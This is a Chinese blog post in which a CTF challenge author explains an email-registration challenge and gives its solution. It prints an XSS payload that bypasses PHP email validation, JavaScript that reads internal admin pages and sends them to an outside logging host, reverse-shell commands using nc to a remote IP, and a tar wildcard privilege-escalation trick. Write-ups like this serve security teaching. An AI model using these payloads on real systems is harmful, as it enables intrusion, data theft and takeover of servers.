ctf 权限提升

第九届SWPUCTF-有趣的邮箱注册出题思路

Posted by sp4rk on December 20, 2018

最后一届在学校举办的校赛,时间真快啊,马上毕业了,感谢@小东哥,@谢队等学弟的帮忙,这次线上线下的比赛也算圆满举行了。

0x01 出题思路

之前看到有人发了个 FILTER_VALIDATE_EMAIL 的绕过,就想着出个XSS。用phantomJS去访问读取内网的资源,让他们通过XHR来读源码,后面的tar提权是@小东哥提供的思路。

0x02 WriteUp

check.php右键发现源码有php

<!--check.php
if($_POST['email']) {
$email = $_POST['email'];
if(!filter_var($email,FILTER_VALIDATE_EMAIL)){
echo "error email, please check your email";
}else{
echo "等待管理员自动审核";
echo $email;
}
}
?>

于是提交payload

"aaa><script/src=http://sp4rk.cn:6324/duyuanma.js</script>"@a.aaa

var a = new XMLHttpRequest();
a.open('GET', 'http://localhost:6324/admin/admin.php', false);
a.send(null);
b = a.responseText;
location.href = 'http://t15em7.ceye.io/d' + escape(b);

可以看到admin/a0a.php下面有个命令执行,于是弹shell

var a = new XMLHttpRequest();
a.open('GET', 'http://localhost:6324/admin/a0a.php?cmd=nc+-e+%2fbin%2fbash+118.89.56.208+6325', false);
a.send(null);
b = a.responseText;
location.href = 'http://t15em7.ceye.io/' + escape(b);

上层的根目录有个4f0a5ead5aef34138fcbf8cf00029e7b,访问下

这里有个上传和备份文件

发现经过tar *处理,于是上传文件

–checkpoint=1

–checkpoint-action=exec=sh exp.sh

exp.sh

nc -e /bin/bash 118.89.56.208 6325

CATALOG
    FEATURED TAGS
    php pentest python Linux 权限提升 mysql sql injection code audit ctf xss
    FRIENDS